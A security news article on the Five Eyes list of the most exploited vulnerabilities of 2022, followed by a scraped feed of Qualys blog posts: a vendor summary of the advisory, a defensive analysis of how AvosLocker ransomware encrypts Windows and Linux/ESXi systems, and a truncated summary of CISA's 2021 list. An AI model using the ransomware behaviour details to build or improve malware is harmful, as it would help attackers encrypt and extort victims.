[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoBeYlJXEHlGr6rAJniL2XD4Ma4efotehIvHqoBelnDjYCGmj8xiT_Ywd1KZ4ib2iPE9jPLa0Pm_4yinuBV4dFS1DU6tYFmtWc8MCdQ0JAX1qTBXY6Airy55EM3rJtfcw5XqbClVD4K7dX5ocGZfUZHAalQRMYv6Ujka3fZWMc6HDW2AIMvXuZB6SsXGos/s728-e365/flaws.jpg>)
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022.
"In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five Eyes nations, which comprises Australia, Canada, New Zealand, the U.K., and the U.S., [said](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>) in a joint alert.
The continued weaponization of [CVE-2018-13379](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>), which was also one among the most exploited bugs in [2020](<https://thehackernews.com/2021/07/top-30-critical-security.html>) and [2021](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>), suggests a failure on the part of organizations to apply patches in a timely manner, the authorities said.
"Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs," according to the advisory. "While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years."
[](<https://thn.news/edWGl41h> "Cybersecurity" )
[CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) refers to a path traversal defect in the FortiOS SSL VPN web portal that could allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Some of other widely exploited flaws include:
* [CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) (ProxyShell)
* [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (Unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus)
* [CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)
* [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (Log4Shell)
* [CVE-2022-22954](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Remote code execution in VMware Workspace ONE Access and Identity Manager)
* [CVE-2022-22960](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation)
* [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (Unauthenticated remote code execution in F5 BIG-IP)
* [CVE-2022-30190](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (Follina)
* [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)
"Attackers generally see the most success exploiting known vulnerabilities within the first two years of public disclosure and likely target their exploits to maximize impact, emphasizing the benefit of organizations applying security updates promptly," the U.K.'s National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/ncsc-allies-reveal-2022-common-exploited-vulnerabilities>).
"Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations)," the agencies noted.
Found this article interesting? Follow us on [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"qualysblog": [{"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.'s CISA, NSA, and FBI; Canada's CCCS; U.K.'s NCSC-UK; Australia's ACSC; and New Zealand's NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities principal in specific targets' networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVE or CVE chains. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPNs' CVE-2018-13379 and widespread vulnerabilities such as Apache's Log4Shell (CVE-2021-44228). They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine and VMware. The exploitation often resulted from organizations' failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities that could potentially lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer initial network access to cyber criminals, enabling infamous activities like data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities that could potentially compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, exploits Apache's log4j Java library, possibly leading to a total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian's Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. \n\n### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**\n\nOur data, which sheds light on the patching behavior for 12 significant vulnerabilities, is pulled from the Qualys TruRisk Platform. This data is anonymized to ensure that any data analysis cannot revert to identifying specific organization or asset information. \n\nThe data highlights a prominent challenge where some vulnerabilities witness rapid mitigation, highlighting proactive security measures. In contrast, others face prolonged remediation times, raising concerns about potential exposure risks. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot contrasting the patch rates and remediation times for 12 frequently exploited vulnerabilities in 2022 further illustrates this point. It shows that while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to do so with speed and diligence, especially for high-risk vulnerabilities. \n\n\n\nFig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022 \n\nThe damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights. \n\n### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines** \n\nThe recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management. \n\nQualys' suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with CSA's call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys' unified platform, organizations can efficiently adhere to international best practices outlined in the CSA, enhancing their defense against cyber threats. \n\nIn addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection. \n\nQualys Threat Protection aligns seamlessly with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA's guidelines and achieve a fortified security posture. \n\nQualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It is leveraging an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments and bypassing the limitations of signature-based systems. \n\n\n\nFig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022 \n\nThe [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON zipped) helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score, high-risk vulnerabilities, and Top Exploited Vulnerabilities. Once you identify the vulnerable assets for these top vulnerable CVEs prioritized among your remediation owners, you can instantly use Qualys Patch management to reduce the risk. \n\nIn conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routine vulnerabilities. Qualys provides robust solutions that align seamlessly with CSA's recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing landscape. Consequently, organizations can strengthen their defenses against cyber threats by sticking to CSA guidelines and leveraging comprehensive cybersecurity solutions like Qualys'. \n\n## References\n\n[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)\n\n## Additional Contributor \n\n * Ramesh Ramachandran, Principal Product Manager, Qualys\n * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-24T19:07:05", "type": "qualysblog", "title": "Qualys Tackles 2022\u2019s Top Routinely Exploited Cyber Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-24T19:07:05", "id": "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the ".avos" extension. An updated variant appends with the extension ".avos2". Similarly, the Linux version appends with the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\nFig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\nFig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the "avo2" extension to the file using MoveFileWithprogressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended "avos2" extensions.\n\nFig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned on the ransom note to AvosLocker's website (fig. 19), the victim will be redirected to the "payment" page.\n\nFig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi.\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\nFig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 